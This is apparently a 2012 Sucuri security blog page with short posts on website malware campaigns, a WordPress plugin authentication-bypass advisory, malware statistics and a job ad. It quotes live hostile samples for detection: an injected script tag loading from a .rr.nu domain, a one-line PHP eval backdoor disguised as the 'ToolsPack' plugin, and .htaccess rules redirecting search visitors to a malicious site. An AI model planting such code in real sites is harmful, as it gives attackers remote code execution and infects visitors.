Malware Campaign from .rr.nu

No, they don’t quit, so get used to it! We are seeing quite a few websites being compromised with malware getting loaded from random domains in the .rr.nu TLD.

This is what gets added to the footer of the hacked sites:

<script  src= "http://trill18ionsa.rr.nu/pmg.php?dr=1"></script>

Once loaded, it does another level of redirection to http://ixeld52erlya.rr.nu/n.php?h=1&s=pmg (random domain, but using the parameters h1&s=pmg), which will then attempt to exploit via browser using multiple exploit kits.


Read More

Sucuri is Hiring: Junior Support Analyst

Our team is growing and we have an opening for a Junior Support Analyst (remote).

If you have a passion for the web, security, and looking to become part of a dynamic global team, then this is where you want to be.

Job Position: Junior Support Analyst

Description: As a Junior Support Analyst you will be required to troubleshoot web site security issues (learn to fix them), patiently engage with clients, and effectively work and communicate with our global team.

Sucuri employs manual and automated techniques to analyze, decode, and fix web-based malware. The right candidate will have the opportunity to learn and apply these techniques in their day-to-day duties. If you like the challenge of fixing broken websites and reversing the effects of malware, then you’ll love this job.

What we look for:

  • Linux experience – CLI
  • Managing WordPress, Joomla, osCommerce and other CMSs
  • PHP, HTML and shell scripting experience (good, but not required)
  • Open source and community participation
  • Patience with customers
  • Drive to become better, and help us become better
  • Great communication skills with customers, supervisors and peers

*We love to see active community support. If you’re already assisting across the web (WordPress.org, open source project, github, stackoverflow), please include your account name as a reference

Are you ready to make a difference on the web? Send an email with your resume to info@sucuri.net, we’d love to hear from you!

Vulnerability in the Absolute Privacy Plugin

We are seeing reports that a vulnerability in the Absolute Privacy WordPress plugin (link) is being used to hack and compromise sites with it installed.

This plugin has a serious unpatched security vulnerability that allows anyone to login in the WordPress site without a password. From Secunia:

Schaffnern has discovered a vulnerability in the Absolute Privacy plugin for WordPress, which can be exploited by malicious people to bypass certain security restrictions.

The vulnerability is caused due to an error within the “abpr_authenticateUser()” function in wp-content/plugins/absolute-privacy/functions.php, which prevents the password from being verified. This can be exploited to bypass the authentication mechanism and gain administrative access to the application.

The vulnerability is confirmed in version 2.0.5. Other versions may also be affected.

Note that this plugin has had more than 35 thousand downloads and no patches for this bug. We recommend deleting this plugin asap until a fix is in place.

Our team is still analysing this vulnerability and we will post more details soon. Additional information and original report was found here.


If you think your site has been compromised, you can verify it in here: http://sitecheck.sucuri.net

New WordPress ToolsPack Plugin

We deal with many compromised sites daily and lately we are seeing something in common across many of the sites running WordPress.

They have installed a plugin called ToolsPack ( ./wp-content/plugins/ToolsPack/ToolsPack.php), which according to the author will “Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!”

Interesting…

However, when we look at the plugin code, all it does is this:

<?php
/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;
?>

If you are not familiar with PHP, this is just a backdoor that allows attackers to execute any code on your site. If you see this plugin installed on your system, remove it right away!

How this plugin got in there is a different question. On some of compromised websites we noticed it implemented via wp-admin (so stolen passwords), and on others it is being installed via another backdoor.

Removing this plugin will not likely solve your security issues. You have to do a full review of the website – check all your files, update WordPress, change passwords, etc.

Have you seen this plugin, or something like it? make sure to leave a comment with your experience.


Site is hacked? Not sure? Check here http://sitecheck.sucuri.net

Sucuri SiteCheck – Web Malware Distribution – January 2012

As many know, we have been offering our free website malware scanner – Sucuri SiteCheck, since early in 2011. In our commitment to continue to give back to the community, we want to share some statistics. We’d like to share the distribution of infections based on the number of sites that are being scanned using Sucuri SiteCheck.

In January, we scanned a couple 100 thousand sites. From those we were able to better understand the distribution of malware.

SiteCheck Web Malware Distro


Read More

Malware Redirecting To Enormousw1illa.com

We are seeing a large number of sites compromised with a conditional redirection to the domain http://enormousw1illa.com/ (194.28.114.102).

On all the sites we analyzed, the .htaccess file was modified so that if anyone visited the site from Google, Bing, Yahoo, or any major search engine (by checking the referer), it would get redirected to that malicious domain (http://enormousw1illa.com/nl-in.php?nnn=556).

This is what gets added to the .htaccess file of the hacked sites:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://enormousw1illa.com/nl-in.php?nnn=556 [R,L]

Google is already blacklisting it and so far it found that it was used to compromise 787 domains (but the number is probably bigger, since that domain just went live 3 days ago – Jan 29):

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 787 domain(s), including mieszkanielondyn.com/, thecentsiblelife.com/, red66.com/.

What is very interesting is that this malware is hosted at the same IP address as other domains that were used in .htaccess attacks in the past, so we think it is all done by the same group:

enormousw1illa.com
infoitpoweringgathering.com
sweepstakesandcontestsdo.com
sweepstakesandcontestsnow.com
.. few more domains ..

We will be monitoring how it is growing and we will post more details soon.


If your site is compromised, check your .htaccess to see if it was modified. If you are not sure, run a scan on your site here: http://sitecheck.sucuri.net